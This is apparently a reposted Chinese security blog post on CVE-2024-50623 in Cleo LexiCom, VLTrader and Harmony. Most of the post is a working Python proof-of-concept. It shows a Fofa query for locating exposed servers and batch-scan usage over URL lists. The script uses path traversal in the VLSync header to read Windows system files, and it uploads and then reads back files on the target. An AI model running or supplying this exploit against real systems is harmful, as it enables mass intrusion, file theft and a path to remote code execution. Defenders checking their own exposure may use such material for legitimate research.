Cleo LexiCom、VLTransfer 和 Harmony 软件中存在不受限制的文件上传和下载漏洞,由于缺乏对上传文件和下载功能的适当验证和限制,攻击者可能利用该漏洞上传恶意文件并可能利用系统的访问/下载功能或其他机制触发恶意文件执行,成功利用该漏洞可能导致远程代码执行,从而造成数据泄露、篡改,甚至进一步的网络攻击。
影响版本:Cleo Harmony < 5.8.0.24Cleo VLTrader< 5.8.0.24Cleo LexiCom< 5.8.0.24
一、搜索引擎语句
Fofa:server="Cleo"二、批量检测:
python poc.py -f url.txt三、单个检测:
python poc.py -u your-ip
POC
import requests
import urllib3
from urllib.parse import urljoin
import argparse
import ssl
import re
ssl._create_default_https_context = ssl._create_unverified_context
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
def banner():
print("\033[36m" + """
****************************************************
* CVE-2024-50623 *
* Cleo LexiCom 远程代码执行检测脚本 *
* 作者: iSee857 *
****************************************************
""" + "\033[0m")
def read_file(file_path):
with open(file_path, 'r') as file:
urls = file.read().splitlines()
return urls
def version_to_tuple(version_str):
return tuple(map(int, version_str.split('.')))
def check(url):
protocols = ['http://', 'https://']
found_vulnerabilities = False
for protocol in protocols:
target_url = urljoin(protocol + url.lstrip('http://').lstrip('https://'), "/")
print(f"Checking CVE-2024-50623")
target_url=target_url.rstrip("/")
target_endUrl = urljoin(target_url, "/Synchronization")
headers_version = {
"User-Agent": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36"
}
try:
response = requests.get(target_endUrl, verify=False, headers=headers_version, timeout=15)
if response.status_code == 500:
server_header = response.headers.get('Server', '')
print(f"Server: {server_header}")
# 提取产品名和版本号
match = re.search(r'Cleo (\w+)/([\d.]+)', server_header)
if match:
lexicom = match.group(1)
version_str = match.group(2).strip()
print(f"\033[32m版本产品名: {lexicom}\033[0m")
print(f"\033[32m版本号: {version_str}\033[0m")
# 版本号判断
version_tuple = version_to_tuple(version_str)
target_version_tuple = version_to_tuple("5.8.0.24")
if version_tuple < target_version_tuple:
print(f"\033[31m{target_url}->>>{version_str} 版本可能存在漏洞\033[0m")
else:
print(f"\033[32m{target_url}->>>{version_str} 版本不存在漏洞\033[0m")
return False
headers_ReadAnyFile = {
"User-Agent": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36",
"Cookie": "jSessionId=dk8h1dw71uq7",
"VLSync": f'Retrieve;l=Ab1234-RQ0258;n={lexicom};v={version_str};a=1337;po=5080;s=True;b=False;pp=1337;path=..\..\..\windows\system.ini',
}
response_readAnyFile = requests.get(target_endUrl, verify=False, headers=headers_ReadAnyFile, timeout=15)
if response_readAnyFile.status_code == 200 and all(responsekey in response_readAnyFile.text for responsekey in ("386", "driver", "[mci]","; for")):
print(f"\033[31mFind:{url}:Cleo_CVE-2024-50623_ReadAnyFile!\033[0m")
headers_ReadAnyFileForUpload = {
"User-Agent": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36",
"Cookie": "jSessionId=dk8h1dw71uq7",
"VLSync": f'Retrieve;l=Ab1234-RQ0258;n={lexicom};v={version_str};a=1337;po=5080;s=True;b=False;pp=1337;path=test.txt'
}
headers_upload = {
"User-Agent": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36",
"VLSync": f'ADD;l=Ab1234-RQ0258;n={lexicom};v={version_str};a=192.168.1.100;po=5080;s=True;b=False;pp=myEncryptedPassphrase;path=test.txt'
}
payload_upload = "112233"
response_upload = requests.post(target_endUrl, verify=False, headers=headers_upload, data=payload_upload, timeout=15)
if response_upload.status_code == 200:
response_readUploadedFile = requests.get(target_endUrl, verify=False, headers=headers_ReadAnyFileForUpload, timeout=15)
if response_readUploadedFile.status_code == 200 and all(responsekey in response_readUploadedFile.text for responsekey in ("112233")):
print(f"\033[31mFind:{url}:Cleo_CVE-2024-50623_upload!\033[0m")
return True
else:
print(f"\033[31m{target_url}:未找到产品名和版本号相关信息\033[0m")
return True
except Exception as e:
print(f"Error checking {target_endUrl}: {e}")
if __name__ == "__main__":
banner()
parser = argparse.ArgumentParser()
parser.add_argument("-u", "--url", help="URL")
parser.add_argument("-f", "--txt", help="file")
args = parser.parse_args()
url = args.url
txt = args.txt
if url:
check(url)
elif txt:
urls = read_file(txt)
for url in urls:
check(url)
else:
print("help")
原文始发于微信公众号(Web安全工具库):Cleo 远程代码执行漏洞复现(CVE-2024-50623)(附脚本)
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论